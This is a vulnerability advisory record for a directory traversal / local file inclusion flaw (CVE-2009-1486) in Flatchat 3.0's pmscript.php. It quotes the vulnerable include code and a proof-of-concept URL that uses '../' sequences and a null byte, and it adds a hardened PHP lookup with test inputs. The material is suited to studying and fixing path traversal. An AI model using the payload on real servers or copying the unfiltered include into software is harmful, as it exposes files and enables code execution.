Ninjadesigns Flatchat 'pmscript.php' Directory Traversal Vulnerability

Vulnerability ID: 1117651    Vulnerability type: Path traversal
Published: 2009-04-27    Updated: 2009-05-06
CVE ID: CVE-2009-1486    CNNVD-ID: CNNVD-200904-549
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/8549
https://www.securityfocus.com/bid/34734
https://cxsecurity.com/issue/WLB-2009040247
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-549
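|Vulnerability details
pmscript.php in Flatchat 3.0 contains a directory traversal vulnerability. A remote attacker can include and execute arbitrary local files via the with parameter (with the value set to '..').
|Exploit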
##########################################################################################
[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Local File Inclusion

  - Vulnerable code in pmscript.php

--------------------------------------------
// 'with' comes straight from the query string and is concatenated into the path unfiltered
$filename = 'users/'.$_GET['with'].'.php';

if (file_exists($filename)) {
    include($filename);
}
--------------------------------------------


    http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]
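
The include shown in the advisory uses `with` as a path component without any filtering. A hardened form of that lookup follows as an added example; it is not Flatchat's code or the advisory author's. The helper name `resolve_user_file`, the user-name pattern and the demo files are assumptions made for illustration.

```php
<?php
// Added example, not Flatchat's own code. Assumption: a valid 'with' value is a
// plain user name made of letters, digits, '_' or '-' (1 to 32 characters).

// Hypothetical helper: returns the absolute path of users/<name>.php, or null.
function resolve_user_file(string $baseDir, $with): ?string
{
    // 1. Allow-list the value; this rejects '.', '/', '\' and NUL bytes outright.
    //    \z (not $) so a trailing newline cannot slip through. Arrays sent as
    //    with[]=x fail the is_string() check.
    if (!is_string($with) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $with)) {
        return null;
    }
    // 2. Canonicalise and confirm the result is still inside the users directory
    //    (defence in depth; also covers symlinks placed inside users/).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $with . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside users/
    }
    return $path;
}

// Constructed demo data: a temporary users/ directory with one legitimate file
// and one file outside it that must never be reachable.
$root  = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'flatchat_demo_' . getmypid();
$users = $root . DIRECTORY_SEPARATOR . 'users';
@mkdir($users, 0700, true);
file_put_contents($users . DIRECTORY_SEPARATOR . 'alice.php', "<?php // alice's PM data\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'secret.php', "<?php // outside users/\n");

// Constructed inputs, including the traversal value quoted in the advisory.
$inputs = ['alice', '../secret', "../../../../../BOOTSECT.BAK\0", ['alice'], 'nobody'];
foreach ($inputs as $with) {
    $path = resolve_user_file($users, $with);
    printf("%-45s => %s\n", json_encode($with), $path === null ? 'rejected' : 'include ' . $path);
}
```

In pmscript.php the equivalent call would pass `$_GET['with'] ?? null` and run `include` only when the helper returns a non-null path.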
|Affected products
Ninja Designs Flatchat 3.0
|References

Source: MILW0RM
Name: 8549
Link: http://www.milw0rm.com/exploits/8549
Source: SECUNIA
Name: 34904
Link: http://secunia.com/advisories/34904